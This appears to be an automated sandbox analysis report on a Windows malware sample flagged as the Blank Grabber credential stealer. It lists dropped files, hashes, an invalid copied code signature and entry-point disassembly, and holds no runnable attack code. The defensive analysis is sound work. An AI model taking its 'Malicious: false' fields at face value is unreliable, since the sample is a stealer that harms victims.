Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):60176
Entropy (8bit):7.847943448203495
Encrypted:false
SSDEEP:1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
MD5:8CD40257514A16060D5D882788855B55
SHA1:1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
SHA-256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
SHA-512:A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):68368
Entropy (8bit):7.86108869046165
Encrypted:false
SSDEEP:1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
MD5:7EF27CD65635DFBA6076771B46C1B99F
SHA1:14CB35CE2898ED4E871703E3B882A057242C5D05
SHA-256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
SHA-512:AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1394456
Entropy (8bit):5.531698507573688
Encrypted:false
SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:A9CBD0455B46C7D14194D1F18CA8719E
SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:false
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):116152
Entropy (8bit):7.710598542399932
Encrypted:false
SSDEEP:1536:T92W3Q3S9sPAG8pRHaymy/8/u+BeLJS3zeBV5+ilKP4zQMPDMaR9vRgXIVqZjDlv:u5Ixbb/8/De1Su+hPM9Pzu4VMe5nW
MD5:72A26F137C9B188C5E6BB736A4F3F44B
SHA1:E30621CBF3C96819D8A9CE377E5DBBCD28F91196
SHA-256:0DACCFB042D394E0D7DB3C6CE5FFBED6C4DF9BED3E3F29AD39366AD31C83838B
SHA-512:3FAF2BBBD90A50C0A70323AA866B5ED37D5775B551F76C8F1E479EAF02C6BF2B117E4AD86C6E274576ABD2645EBB71F80A79E5F3960EAEBEA11C029C5791453F
Malicious:false
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:DOS executable (COM)
Category:dropped
Size (bytes):284296
Entropy (8bit):7.995427844782166
Encrypted:true
SSDEEP:6144:BzMD1RW7EqTsIiYHxEyEIwQxys5BaVKb+mEQ3XdUzKvRnHqnVG:RIReEcZ8UyKbEQ3XdvRnIs
MD5:7ACDDDB95612D1E0C2E806A9CA72432F
SHA1:BA7EDE3271E1D5CC0E807603D9284C26CEF1B80B
SHA-256:DCCF165E44C7B2584CE3418A85D8D571AFB9CC6DB6C9280B7C90DCF8BAEEF7EA
SHA-512:6C81E99851405E2B1B639EA7EF51FD1DA84D9D50F95579F7D8C4442EC5566F79B99C0DE594E5823687DB582F47A38C6C71B8B15DE04BDE4CEFC630EBF5E09CBB
Malicious:false
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1630488
Entropy (8bit):7.952879310777133
Encrypted:false
SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:8377FE5949527DD7BE7B827CB1FFD324
SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):29968
Entropy (8bit):7.677818197322094
Encrypted:false
SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:08B000C3D990BC018FCB91A1E175E06E
SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):227096
Entropy (8bit):7.928768674438361
Encrypted:false
SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1850640
Entropy (8bit):7.994061638516346
Encrypted:true
SSDEEP:49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
SHA1:0003946454B107874AA31839D41EDCDA1C77B0AF
SHA-256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
SHA-512:1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):630736
Entropy (8bit):6.409476333013752
Encrypted:false
SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:ASCII text
Category:dropped
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:4531984CAD7DACF24C086830068C4ABE
SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key, Author: Joe Security
Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):26384
Entropy (8bit):7.471075877103443
Encrypted:false
SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
MD5:FB70AECE725218D4CBA9BA9BBB779CCC
SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):659216
Entropy (8bit):7.993010988331354
Encrypted:true
SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
MD5:21AEA45D065ECFA10AB8232F15AC78CF
SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):267024
Entropy (8bit):7.9826656358602595
Encrypted:false
SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
MD5:B2712B0DD79A9DAFE60AA80265AA24C3
SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Note: this is the benign probe script PowerShell writes to the temp directory at startup to learn whether AppLocker/WDAC puts it into constrained language mode. Its presence proves only that powershell.exe was launched; it is not attacker content.
(The same 60-byte AppLocker test file, with identical hashes and Process: powershell.exe, is recorded three further times in the report; the records are byte-for-byte identical to the one above and are not repeated here.)
Process: C:\Windows\System32\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.394157599951799
Encrypted: false
SSDEEP: 6144:Cl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAAOBSqa:S4vF0MYQUMM6VFYSAU
MD5: 6C679AE2BC67F9C0D2933070D23B6299
SHA1: AE90070E5D3E3CA4BCE56631928A869FF76DB0DA
SHA-256: 133BD15DA8AD3F679C6D9C3D79C4D44D745383D085C900E4D66346B562C9DD78
SHA-512: F9CE444448349B6A13CDEF4AE79945F15AEDBD986F090D95E939D32F7E4AAF9FDBEBD3BD5433510F8EF6CB6A30FC6D365617D41D159F5E4C872D8D7510913CD5
Malicious: false
Preview: regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.<..( (the remainder of the preview is the hive's null padding, rendered as dots)
Note: the "regf" magic and the embedded UTF-16 path \AppCompat\Programs\Amcache.hve identify this as a copy of the Amcache application-compatibility hive written by WerFault.exe, i.e. Windows Error Reporting activity rather than a file the sample created itself.
Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 97
Entropy (8bit): 4.331807756485642
Encrypted: false
SSDEEP: 3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5: 195D02DA13D597A52F848A9B28D871F6
SHA1: D048766A802C61655B9689E953103236EACCB1C7
SHA-256: ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512: 1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious: false
Preview (CRLF line breaks shown as separate lines):
Service Version: 0.0.0.0
Engine Version: 0.0.0.0
No engine/signature is currently loaded.
Note: this is MpCmdRun.exe's own status output, captured after it ran. Both versions reporting 0.0.0.0 and the final line mean Defender had no engine or signature set loaded at that point in the analysis.
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 7.993796413048127 (close to the 8.0 maximum: almost all of the file is compressed or encrypted data)
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File size: 8'240'610 bytes
MD5: 3c1b1f453e5f9f0d71f7862d2d6235fe
SHA1: 2092b1b88e17b165ea635b136aceecb05c54e042
SHA256: 984156f2a09823ce55d34fab0738e81d086b4599dbba3b1f6282aa3cce64524a
SHA512: effef144d925e8aeb8e499331b339a7341709b2e443dd29df0dd36a59d9f9e1321d7e14089f7cd0f3eecf86f225e755d12a23eb74d75cdfda508a67ce7a56431
SSDEEP: 196608:5QHY8OewfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jF:7VIHziK1piXLGVE4Ue0VJB
TLSH: C68633016A8009F6F6F78A3D88929419C4B336A217A0D6FF131CD2790EA35FA5D36777
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x14000cdb0
Entrypoint Section: .text
Digitally signed: true (an Authenticode signature block is present; whether it verifies is reported under Signature Valid below)
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x671D2D88 [Sat Oct 26 17:57:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 72c4e339b7af8ab1ed2eb3821c98713a
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash computed over the file does not match the hash stored in the signature)
Not Before, Not After
• 29/09/2021 01:00:00 29/09/2024 00:59:59
Subject Chain
• CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version: 3
Thumbprint MD5: 5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1: 3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256: 60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial: 00BFB15001BBF592D4962A7797EA736FA3
Note: a bad-digest result is what a file that was modified after signing, or that carries a signature block copied from a different binary, produces. The PE Time Stamp (26 Oct 2024) also falls after the certificate's Not After date (29 Sep 2024). The embedded EV certificate therefore vouches for nothing about this file, and the subject name must not be read as evidence of who built it.
Instruction (entry-point region; this is 64-bit code rendered by a 32-bit decoder, so every `dec eax` below is the 0x48 REX.W prefix of the instruction that follows it, e.g. `dec eax; sub esp, 28h` is really `sub rsp, 28h`)
dec eax
sub esp, 28h
call 00007F088532C1ECh
dec eax
add esp, 28h
jmp 00007F088532BE0Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F088532C5B8h
test eax, eax
je 00007F088532BFB3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F088532BF97h
dec eax
cmp ecx, eax
je 00007F088532BFA6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007F088532BF80h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F088532BF89h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F088532BF99h
mov byte ptr [00035765h], 00000001h
call 00007F088532B6E5h
